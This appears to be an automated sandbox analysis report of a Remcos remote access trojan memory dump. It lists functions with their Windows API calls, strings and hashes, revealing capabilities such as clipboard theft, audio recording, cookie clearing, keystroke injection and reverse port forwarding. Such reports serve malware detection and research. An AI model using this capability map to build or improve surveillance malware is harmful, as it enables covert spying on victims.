                                                                                  • Instruction ID: ff50de85f816598f14f139fcbfe24147e98e2bb745fd097185ef2e944e73ca26
                                                                                  • Opcode Fuzzy Hash: 384f29ba9d6e9cc4eb2ffe2d10ebc108aeca390d7ff074f032fb6a7982b51f69
                                                                                  • Instruction Fuzzy Hash: 98516071A001549BCB04BBB5C8529FD76A8AF55308F04403FF805A71E2EF7C5E85C799
                                                                                  Function 004530E4 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,004541DF), ref: 00453107
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: DecodePointer
                                                                                  • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                  • API String ID: 3527080286-3064271455
                                                                                  • Opcode ID: f53d904abd5658a060f413a89978d0306c3294a3021a30185663c10ae64f840c
                                                                                  • Instruction ID: 9333e61b372fbf41addd7e909d3efe481a8fa84217f9852f3907f1ba123c2b47
                                                                                  • Opcode Fuzzy Hash: f53d904abd5658a060f413a89978d0306c3294a3021a30185663c10ae64f840c
                                                                                  • Instruction Fuzzy Hash: CC518F30900909DBCF10DFA8E9480ADBBB0FF0A347F644196EC81A7216CB799A1DDB1D
                                                                                  Function 004159BA Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00415A1A
                                                                                    • Part of subcall function 0041A20F: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040983B), ref: 0041A228
                                                                                  • Sleep.KERNEL32(00000064), ref: 00415A46
                                                                                  • DeleteFileW.KERNEL32(00000000), ref: 00415A7A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$CreateDeleteExecuteShellSleep
                                                                                  • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                  • API String ID: 1462127192-2001430897
                                                                                  • Opcode ID: 36d359686f8d258eec0ac53b404e0d21dfbbc9de5a162bb8c05c016e87e645cb
                                                                                  • Instruction ID: 7fbd65b43d39327dc9f625a99f058064c4c6325298edc9245ab65683dcac2845
                                                                                  • Opcode Fuzzy Hash: 36d359686f8d258eec0ac53b404e0d21dfbbc9de5a162bb8c05c016e87e645cb
                                                                                  • Instruction Fuzzy Hash: FA315E719402199ACB04FBA1DC96DEE7768EF50308F40017FF506731E2EE785E8ACA99
                                                                                  Function 0041AA4F Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 53memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • AllocConsole.KERNEL32(00000001), ref: 0041AA5D
                                                                                  • ShowWindow.USER32(00000000,00000000), ref: 0041AA76
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocConsoleShowWindow
                                                                                  • String ID: * BreakingSecurity.net$ * Remcos v$--------------------------$--------------------------$3.8.0 Pro$CONOUT$
                                                                                  • API String ID: 4118500197-4025029772
                                                                                  • Opcode ID: 613498324cd6a8c522b436d369b4391aab2e08fe6d6e431343eccbd2d6afca2c
                                                                                  • Instruction ID: 07661f9972e693547954b0fc743ee20e91627884e026026f5b86345d1a8b50cd
                                                                                  • Opcode Fuzzy Hash: 613498324cd6a8c522b436d369b4391aab2e08fe6d6e431343eccbd2d6afca2c
                                                                                  • Instruction Fuzzy Hash: CE015271D803586ADB10EBF59C06FDF77AC6B18708F54142BB100A7095E7FC950C4A2D
                                                                                  Function 0041B212 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041B22B
                                                                                    • Part of subcall function 0041B2C4: RegisterClassExA.USER32(00000030), ref: 0041B310
                                                                                    • Part of subcall function 0041B2C4: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041B32B
                                                                                    • Part of subcall function 0041B2C4: GetLastError.KERNEL32 ref: 0041B335
                                                                                  • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041B262
                                                                                  • lstrcpynA.KERNEL32(00471AF8,Remcos,00000080), ref: 0041B27C
                                                                                  • Shell_NotifyIconA.SHELL32(00000000,00471AE0), ref: 0041B292
                                                                                  • TranslateMessage.USER32(?), ref: 0041B29E
                                                                                  • DispatchMessageA.USER32(?), ref: 0041B2A8
                                                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041B2B5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                  • String ID: Remcos
                                                                                  • API String ID: 1970332568-165870891
                                                                                  • Opcode ID: 6a629144b245819b38f2933f29616ef2380529a0a937335efbac9e54df28edc4
                                                                                  • Instruction ID: 392c2ce23d615fe7cfca65c1bdf78dc563e79c4ff08160ae13be93183ad442b8
                                                                                  • Opcode Fuzzy Hash: 6a629144b245819b38f2933f29616ef2380529a0a937335efbac9e54df28edc4
                                                                                  • Instruction Fuzzy Hash: CD013971901308ABCB10DBB9ED4EEDB7BBCFB85B05F40417AF51992061D7B89489CB68
                                                                                  Function 00449F63 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: dee208c16fd6e6a71a697de3b175f4e390e38276f2012422441a095a82cae68d
                                                                                  • Instruction ID: 53180985ac70b1d9c95f382170f9691aec8243d5c40cf1d2be039b65846bfc46
                                                                                  • Opcode Fuzzy Hash: dee208c16fd6e6a71a697de3b175f4e390e38276f2012422441a095a82cae68d
                                                                                  • Instruction Fuzzy Hash: 2DC12970D44245AFEB11DFA8D841BEEBBB0BF19304F04419AE844A7392C7798D51DB6B
                                                                                  Function 00452DBB Relevance: 13.8, APIs: 9, Instructions: 272COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00452A89: CreateFileW.KERNEL32(00000000,00000000,?,00452E64,?,?,00000000,?,00452E64,00000000,0000000C), ref: 00452AA6
                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FF8BC35D), ref: 00452ECF
                                                                                  • __dosmaperr.LIBCMT ref: 00452ED6
                                                                                  • GetFileType.KERNEL32(00000000), ref: 00452EE2
                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FF8BC35D), ref: 00452EEC
                                                                                  • __dosmaperr.LIBCMT ref: 00452EF5
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00452F15
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0045305F
                                                                                  • GetLastError.KERNEL32 ref: 00453091
                                                                                  • __dosmaperr.LIBCMT ref: 00453098
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                  • String ID:
                                                                                  • API String ID: 4237864984-0
                                                                                  • Opcode ID: 474c31a6c8ccfba43807a2a750eddd9e1d52ca803bebdbe2fa86fef5e1c33935
                                                                                  • Instruction ID: def4621c7e831d5678052e1043e56ea9e2bfce8be848437acb5cac56d61a7e39
                                                                                  • Opcode Fuzzy Hash: 474c31a6c8ccfba43807a2a750eddd9e1d52ca803bebdbe2fa86fef5e1c33935
                                                                                  • Instruction Fuzzy Hash: CAA15832A101049FDF19EF68D8417AE7BB1AB0A325F14015FFC419B392DB798D1ACB5A
                                                                                  Function 00450F63 Relevance: 13.8, APIs: 9, Instructions: 268COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0045123C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 0045100F
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0045123C,00000000,00000000,?,00000001,?,?,?,?), ref: 00451092
                                                                                  • __alloca_probe_16.LIBCMT ref: 004510CA
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,0045123C,?,0045123C,00000000,00000000,?,00000001,?,?,?,?), ref: 00451125
                                                                                  • __alloca_probe_16.LIBCMT ref: 00451174
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,0045123C,00000000,00000000,?,00000001,?,?,?,?), ref: 0045113C
                                                                                    • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433049,?,P@,004365E7,?,?,00000000,?,P@,0040C88A,00433049,?,?,?,?), ref: 0044367B
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,0045123C,00000000,00000000,?,00000001,?,?,?,?), ref: 004511B8
                                                                                  • __freea.LIBCMT ref: 004511E3
                                                                                  • __freea.LIBCMT ref: 004511EF
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                                  • String ID:
                                                                                  • API String ID: 201697637-0
                                                                                  • Opcode ID: 77818321e3ce56ea0e71bb7bca8220fb6369df6bc1e17647591189b9ba8744e1
                                                                                  • Instruction ID: 005ec385ace484c3041e352596739c7debf7d66643145b34d09858c349e559c3
                                                                                  • Opcode Fuzzy Hash: 77818321e3ce56ea0e71bb7bca8220fb6369df6bc1e17647591189b9ba8744e1
                                                                                  • Instruction Fuzzy Hash: C191D632E002169BDB209EA5C881BAF7BB59F09716F14025BED00E7292D72DDD89C768
                                                                                  Function 0044268B Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00445725: GetLastError.KERNEL32(00000020,?,00438595,?,?,?,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B), ref: 00445729
                                                                                    • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                                                                    • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 0044579D
                                                                                    • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                                                                  • _memcmp.LIBVCRUNTIME ref: 00442935
                                                                                  • _free.LIBCMT ref: 004429A6
                                                                                  • _free.LIBCMT ref: 004429BF
                                                                                  • _free.LIBCMT ref: 004429F1
                                                                                  • _free.LIBCMT ref: 004429FA
                                                                                  • _free.LIBCMT ref: 00442A06
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorLast$_abort_memcmp
                                                                                  • String ID: C
                                                                                  • API String ID: 1679612858-1037565863
                                                                                  • Opcode ID: 1b68fb9e24b66cfa6b20be242c75466d086ab93edfb681ab48de3257ce38a64d
                                                                                  • Instruction ID: aeaf983377083d43a1268bd0837f448671c9c2270315b144058cc99b7af0bbb4
                                                                                  • Opcode Fuzzy Hash: 1b68fb9e24b66cfa6b20be242c75466d086ab93edfb681ab48de3257ce38a64d
                                                                                  • Instruction Fuzzy Hash: C6B14B75A01219DFEB24DF19C984AAEB7B4FF08314F5045AEE849A7350E774AE90CF44
                                                                                  Function 00413360 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: tcp$udp
                                                                                  • API String ID: 0-3725065008
                                                                                  • Opcode ID: 688bcc682103751b5d6e0fc50f4ff73081394bc5db4df513150874dffde81862
                                                                                  • Instruction ID: 0146648cb9627796ba72a5075a1bb19f593c332394d5faf8ede73001e6eead87
                                                                                  • Opcode Fuzzy Hash: 688bcc682103751b5d6e0fc50f4ff73081394bc5db4df513150874dffde81862
                                                                                  • Instruction Fuzzy Hash: 0271AB306083029FDB24CF55C4456ABBBE5AB88B06F14483FF88587351DB78CE85CB8A
                                                                                  Function 0040FF5A Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 191COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Eventinet_ntoa
                                                                                  • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
                                                                                  • API String ID: 3578746661-168337528
                                                                                  • Opcode ID: 7aad75cc0eebb2e9d3ac8b012f70ba9c1af19a6d2a5a7bc0ab2fb84483b27ce6
                                                                                  • Instruction ID: 6b7c77c2de925f44c7fd0444b04eaa142d1c015a05a303cede5520b91582e870
                                                                                  • Opcode Fuzzy Hash: 7aad75cc0eebb2e9d3ac8b012f70ba9c1af19a6d2a5a7bc0ab2fb84483b27ce6
                                                                                  • Instruction Fuzzy Hash: 1B51C671A043005BC704FB35E81AAAE36A56B85304F50453FF942972E2EFBD998987CF
                                                                                  Function 004069F4 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00471E78,00462F54,?,00000000,0040708D,00000000), ref: 00406A56
                                                                                  • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,0040708D,00000000,?,?,0000000A,00000000), ref: 00406A9E
                                                                                    • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,0040708D,00000000,?,?,0000000A,00000000), ref: 00406ADE
                                                                                  • MoveFileW.KERNEL32(00000000,00000000), ref: 00406AFB
                                                                                  • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00406B26
                                                                                  • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00406B36
                                                                                    • Part of subcall function 00404B76: WaitForSingleObject.KERNEL32(?,000000FF,?,00471E90,00404C29,00000000,?,?,?,00471E90,?), ref: 00404B85
                                                                                    • Part of subcall function 00404B76: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040546B), ref: 00404BA3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                                  • String ID: .part
                                                                                  • API String ID: 1303771098-3499674018
                                                                                  • Opcode ID: 902e130b94aad18369189187a8e6e7e21762ac87eb431447f7a89350bc37b519
                                                                                  • Instruction ID: 678cfffe15af58d7f0b712f13b91f409224560124cae5e22a1f642ab954cf825
                                                                                  • Opcode Fuzzy Hash: 902e130b94aad18369189187a8e6e7e21762ac87eb431447f7a89350bc37b519
                                                                                  • Instruction Fuzzy Hash: 183195715043519FC210FF61D8859AFB7E8EF84305F40493FB946A21E1DB78DE488B9A
                                                                                  Function 00446FC4 Relevance: 12.2, APIs: 8, Instructions: 216COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042BAB6,?,?,?,00447215,00000001,00000001,?), ref: 0044701E
                                                                                  • __alloca_probe_16.LIBCMT ref: 00447056
                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042BAB6,?,?,?,00447215,00000001,00000001,?), ref: 004470A4
                                                                                  • __alloca_probe_16.LIBCMT ref: 0044713B
                                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044719E
                                                                                  • __freea.LIBCMT ref: 004471AB
                                                                                    • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433049,?,P@,004365E7,?,?,00000000,?,P@,0040C88A,00433049,?,?,?,?), ref: 0044367B
                                                                                  • __freea.LIBCMT ref: 004471B4
                                                                                  • __freea.LIBCMT ref: 004471D9
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 3864826663-0
                                                                                  • Opcode ID: 4a3c7fd5df8aec1f106920e086c0c8b502c59cd20239ccd34f4dcb85e5a0006e
                                                                                  • Instruction ID: 54c76e5b98bc3e662f405ec50a570bffd16f8396d3d33e450f7b83ec1f761fab
                                                                                  • Opcode Fuzzy Hash: 4a3c7fd5df8aec1f106920e086c0c8b502c59cd20239ccd34f4dcb85e5a0006e
                                                                                  • Instruction Fuzzy Hash: C051F372604216AFFB258F65CC81EAF77A9EB44754F19422EFC04D6340EB38DC4296A8
                                                                                  Function 00417949 Relevance: 12.1, APIs: 8, Instructions: 102keyboardCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417982
                                                                                  • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179A3
                                                                                  • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179C3
                                                                                  • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179D7
                                                                                  • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179ED
                                                                                  • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417A0A
                                                                                  • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417A25
                                                                                  • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 00417A41
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: InputSend
                                                                                  • String ID:
                                                                                  • API String ID: 3431551938-0
                                                                                  • Opcode ID: 6aaf5890e5c1829a4f0a9f9de961f2057ca44ae286fc2f2a8f4f79c9cdb01491
                                                                                  • Instruction ID: 18205c9a4f61e0979ba7f31da2e0396e133b47f61cec1eebe1044e0c870e5742
                                                                                  • Opcode Fuzzy Hash: 6aaf5890e5c1829a4f0a9f9de961f2057ca44ae286fc2f2a8f4f79c9cdb01491
                                                                                  • Instruction Fuzzy Hash: BF3180715583086EE311CF51D941BEBBFECEF99B54F00080FF6809A191D2A696C98BA7
                                                                                  Function 00414F40 Relevance: 12.0, APIs: 8, Instructions: 49clipboardCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • OpenClipboard.USER32 ref: 00414F41
                                                                                  • EmptyClipboard.USER32 ref: 00414F4F
                                                                                  • CloseClipboard.USER32 ref: 00414F55
                                                                                  • OpenClipboard.USER32 ref: 00414F5C
                                                                                  • GetClipboardData.USER32(0000000D), ref: 00414F6C
                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00414F75
                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00414F7E
                                                                                  • CloseClipboard.USER32 ref: 00414F84
                                                                                    • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                  • String ID:
                                                                                  • API String ID: 2172192267-0
                                                                                  • Opcode ID: e25419e6d8039f906f8e35a39bb69e24259a120ac2af4df386a8ba427cdc1a67
                                                                                  • Instruction ID: b342c93700c1c5b5557293b3c64df63ecfc3f94f93ee8c928ebb46f035b43356
                                                                                  • Opcode Fuzzy Hash: e25419e6d8039f906f8e35a39bb69e24259a120ac2af4df386a8ba427cdc1a67
                                                                                  • Instruction Fuzzy Hash: 7C015E312443009BD314BF71DC596AA76A8EBE0346F81057EB94A931A3DF3899498A9A
                                                                                  Function 00447757 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00447ECC,00453EB5,00000000,00000000,00000000,00000000,00000000), ref: 00447799
                                                                                  • __fassign.LIBCMT ref: 00447814
                                                                                  • __fassign.LIBCMT ref: 0044782F
                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00447855
                                                                                  • WriteFile.KERNEL32(?,00000000,00000000,00447ECC,00000000,?,?,?,?,?,?,?,?,?,00447ECC,00453EB5), ref: 00447874
                                                                                  • WriteFile.KERNEL32(?,00453EB5,00000001,00447ECC,00000000,?,?,?,?,?,?,?,?,?,00447ECC,00453EB5), ref: 004478AD
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                  • String ID:
                                                                                  • API String ID: 1324828854-0
                                                                                  • Opcode ID: a748b16374f527b7a80cf69ed727348adf3f69da4df0249be72511d103bd3332
                                                                                  • Instruction ID: 74b5e8c6f427b63fe2026e60454d3d85c0c1d9029b0a2cc1a9ecb7a500eaa1fe
                                                                                  • Opcode Fuzzy Hash: a748b16374f527b7a80cf69ed727348adf3f69da4df0249be72511d103bd3332
                                                                                  • Instruction Fuzzy Hash: 32510870E042499FEB10DFA8DC85AEEBBF8EF09300F14416BE951E7291E7749941CB69
                                                                                  Function 00401CEB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _strftime.LIBCMT ref: 00401D30
                                                                                    • Part of subcall function 00401A4D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AB9
                                                                                  • waveInUnprepareHeader.WINMM(0046FA78,00000020,00000000,?), ref: 00401DE2
                                                                                  • waveInPrepareHeader.WINMM(0046FA78,00000020), ref: 00401E20
                                                                                  • waveInAddBuffer.WINMM(0046FA78,00000020), ref: 00401E2F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                  • String ID: %Y-%m-%d %H.%M$.wav
                                                                                  • API String ID: 3809562944-3597965672
                                                                                  • Opcode ID: 6970773257d7bd6b4a9ad9b6f82f9bce4b3c1b2460946ca6bb168bdaee054684
                                                                                  • Instruction ID: eb6f517cf981021e41f9baa65c06222081641aa24e02a1e4c78245b08a68fc14
                                                                                  • Opcode Fuzzy Hash: 6970773257d7bd6b4a9ad9b6f82f9bce4b3c1b2460946ca6bb168bdaee054684
                                                                                  • Instruction Fuzzy Hash: 743150315043009BC314EBA1EC56A9E77E8FB54318F50893EF599A21F2EFB49909CB5E
                                                                                  Function 0040AE2A Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 87COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00411F91: RegOpenKeyExA.KERNELBASE(80000002,00000400,00000000,00020019,?), ref: 00411FB5
                                                                                    • Part of subcall function 00411F91: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00411FD2
                                                                                    • Part of subcall function 00411F91: RegCloseKey.KERNELBASE(?), ref: 00411FDD
                                                                                  • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040AEAC
                                                                                  • PathFileExistsA.SHLWAPI(?), ref: 0040AEB9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                  • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                  • API String ID: 1133728706-4073444585
                                                                                  • Opcode ID: 13b02dafbbb2df2509005d2ea6d237cbb7e060283ac4043076e9ae9448562644
                                                                                  • Instruction ID: 9e227284a7a69f00510d3be81dd7cde1580ac9a58a9ca8fbd928e09bf644cbd9
                                                                                  • Opcode Fuzzy Hash: 13b02dafbbb2df2509005d2ea6d237cbb7e060283ac4043076e9ae9448562644
                                                                                  • Instruction Fuzzy Hash: CF21B170A4020556CB00FBE2CC97DEE7368AF51348F80013FB901772D2EB795A45C6DA
                                                                                  Function 00453D2D Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                                                                  Download Yara Rule
